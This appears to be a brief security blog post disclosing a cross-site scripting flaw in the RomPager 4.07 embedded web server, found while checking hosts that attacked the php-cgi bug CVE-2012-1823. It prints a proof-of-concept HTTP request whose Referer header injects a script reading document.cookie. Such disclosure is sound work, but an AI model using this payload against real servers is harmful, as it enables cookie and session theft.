Category Archives: web server

RomPager 4.07 cross-site scripting vulnerability

During testing IPs that were sources of attacks on php-cgi vulnerability discovered by eindbazen (CVE-2012-1823) accidentally found XSS in Referer header in RomPager/4.07 embedded web server.

GET http://IP.IP.IP.IP/s0urc3_that_not_exists HTTP/1.1

..

Referer: http://dtls.com/”><script>alert(document.cookie)</script&gt;

Advertisements
Tagged , ,